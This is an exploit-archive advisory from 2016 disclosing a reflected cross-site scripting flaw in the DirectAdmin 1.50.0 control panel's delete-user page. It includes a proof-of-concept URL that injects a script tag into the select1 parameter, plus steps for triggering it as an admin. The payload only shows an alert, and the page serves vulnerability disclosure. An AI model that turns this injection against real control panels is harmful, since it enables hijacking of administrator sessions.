Directadmin cp ( Delete User ) 1.50.0 Version XSS Vulnerability

2016.04.11
Credit: Amir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################# # # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@ # ##################################### ##################################### # Iranian Exploit DataBase # Directadmin cp ( Delete User ) 1.50.0 Version Xss Vulnerability # Directadmin Version : 1.50.0 And Old Version # Testet On : Centos 5 and 6 - Directadmin 1.50.0 # Vendor site : http://www.directadmin.com # Pic : http://kkli.ir/VPFl5 # Author : Amir ( Iedb.Ir And IrIsT.Ir ) # Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir - irist.ir # Vulnerability attack information site : http://xssed.Ir/ # Site And Forum : http://iedb.ir & http://iedb.ir/acc # Archive Exploit = http://iedb.ir/exploits-5004.html ##################################### Bug : http://ip:2222[port]/CMD_SELECT_USERS?select1=iedb.ir'"><script>alert('Directadmin Xss - By Amir - Iedb.Ir')</script>&reason=none&delete=Delete&location=CMD_ALL_USER_SHOW Xss In Directadmin - Picture : http://up.iedb.ir/uploads/directadmin-xss-Bug-by-iedb-ir.jpg ------------- Description : To use this bug, you must first Login the admin user has gone DirectAdmin control panel. Then you go to the following: Show All Users Then select a user and click on the delete option. Then open the link where you can enter your code xss. http://ip:2222[port]/CMD_SELECT_USERS?select1=Site'"><script>alert('Directadmin Xss - By Amir - Iedb.Ir')</script>&reason=none&delete=Delete&location=CMD_ALL_USER_SHOW Photo: http://kkli.ir/bIyCB This bug has been tested and works on the new version of DirectAdmin. There are other versions of this security problem. Iedb.Ir And IrIsT.Ir Security And Exploit Team ==>> http://iedb.ir And http://irist.ir Thanks to all my friends and team managers Security http://iedb.ir And http://iedb.ir/acc And http://xssed.ir ##################################### # Archive Exploit = http://kkli.ir/liZLC #####################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top